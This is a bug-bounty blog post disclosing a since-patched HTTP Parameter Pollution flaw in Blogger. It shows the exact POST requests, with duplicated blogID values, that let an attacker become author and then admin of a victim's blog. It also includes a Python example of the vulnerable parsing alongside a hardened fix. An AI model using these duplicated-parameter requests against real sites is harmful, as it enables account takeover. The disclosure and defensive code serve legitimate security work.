29 March 2013

Category: Hacks

This is the first post on my blog and will also be the first post to detail my ability to find security vulnerabilities in the Google Reward Program.

Over the last 2 months, I have participated in the Google Reward Program and found some relatively serious vulnerabilities.

(As a disclaimer, I want to say that Google has a security team full of consummate and brilliant professionals. It is truly amazing how much Google cares about security and how amazing their work is in regard to securing their sites. Thanks Adam of the Google Security Team for allowing me to showcase my skills).

The first vulnerability that I want to reveal is a critical one in the Blogger platform (a Google Service). This vulnerability could be utilized by an attacker to gain administrator privilege over any Blogger account (categorized as a “Permission” issue).

The details regarding the Blogger service issue are as follows.

I located an HTTP Parameter Pollution vulnerability in Blogger that permits an attacker to designate themselves as an administrator on a victim’s Blogger account.

Technical details:

Below, you'll find the steps for gaining admin permissions over virtually any Blogger account:

1. The attacker uses the invite-author option in Blogger (i.e. "add authors").

Vulnerability location:

POST /add-authors.do HTTP/1.1

Request:

security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com(attacker email)&ok=Invite

As you can see, I added two blogID values to my POST request (blogID=attackerblogidvalue&blogID=victimblogidvalue).

The server checks the first blogID value (the attacker's own blog) but then executes the request against the second blogID value (the victim's blog).

2. The attacker then receives an email to confirm him as an author (the author-invitation link). The attacker is added as an author on the victim's account.

3. It is now possible to modify the attacker's permission so that it rises from a simple author to a full admin.

Vulnerability location:

POST /team-member-modify.do HTTP/1.1

Request:

security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges
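The root cause in steps 1 to 3 is that the server resolves a duplicated blogID parameter to a value the caller does not own. The following Python sketch is an added example, not Blogger's code and not the author's: it shows a lax parser that reproduces the last-value-wins behaviour beside a hardened handler that rejects duplicated parameters outright and, independently, checks blog ownership against the session rather than trusting the request body. The handler name, the blog-owner table, the session tokens and the email address are constructed placeholders.

```python
"""Added example (not Blogger's code): strict form parsing and an ownership
check that close the HTTP Parameter Pollution path described in the post."""
from urllib.parse import parse_qs

# Constructed sample data: which session user owns which blog, and each
# user's CSRF token. These stand in for a real database and session store.
BLOG_OWNERS = {"attackerblogidvalue": "attacker", "victimblogidvalue": "victim"}
SESSION_TOKENS = {"attacker": "attackertoken", "victim": "victimtoken"}

# The polluted request body from the post, with the author email replaced
# by a placeholder address.
POLLUTED_BODY = (
    "security_token=attackertoken&blogID=attackerblogidvalue"
    "&blogID=victimblogidvalue&authorsList=attacker%40example.com&ok=Invite"
)


def duplicate_parameters(body):
    """Return the sorted list of keys that appear more than once in the body."""
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(k for k, v in fields.items() if len(v) > 1)


def parse_form_last_wins(body):
    """Lax parsing: a duplicated key silently resolves to the last value.
    This mirrors the behaviour the post describes (first value examined,
    second value executed)."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[-1] for k, v in fields.items()}


class DuplicateParameterError(ValueError):
    pass


def parse_form_strict(body):
    """Hardened parsing: any key supplied more than once is rejected, so a
    second blogID can never override the one that was authorized."""
    dupes = duplicate_parameters(body)
    if dupes:
        raise DuplicateParameterError("duplicate parameters: " + ", ".join(dupes))
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def handle_add_authors(body, session_user, parser=parse_form_strict):
    """Hypothetical /add-authors.do handler. Returns (status, message)."""
    try:
        fields = parser(body)
    except DuplicateParameterError as exc:
        return 400, str(exc)
    if fields.get("security_token") != SESSION_TOKENS.get(session_user):
        return 403, "invalid security token"
    blog_id = fields.get("blogID")
    # Authorization is decided from the session and the owner table, so even
    # the lax parser cannot be steered onto a blog the caller does not own.
    if BLOG_OWNERS.get(blog_id) != session_user:
        return 403, "caller does not own blog %r" % blog_id
    return 200, "invited %s to blog %s" % (fields.get("authorsList"), blog_id)


if __name__ == "__main__":
    print(parse_form_last_wins(POLLUTED_BODY)["blogID"])   # victimblogidvalue
    print(handle_add_authors(POLLUTED_BODY, "attacker"))   # (400, ...)
```

The two defences are deliberately separate: rejecting duplicated parameters stops the pollution at the parsing layer, while the ownership check stops the same request even if a framework upstream has already collapsed the duplicates to one value.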

PoC Video (full video download): http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html

(The vulnerability described here was confirmed and patched very quickly by the Google Security Team.)

By @Nirgoldshlager
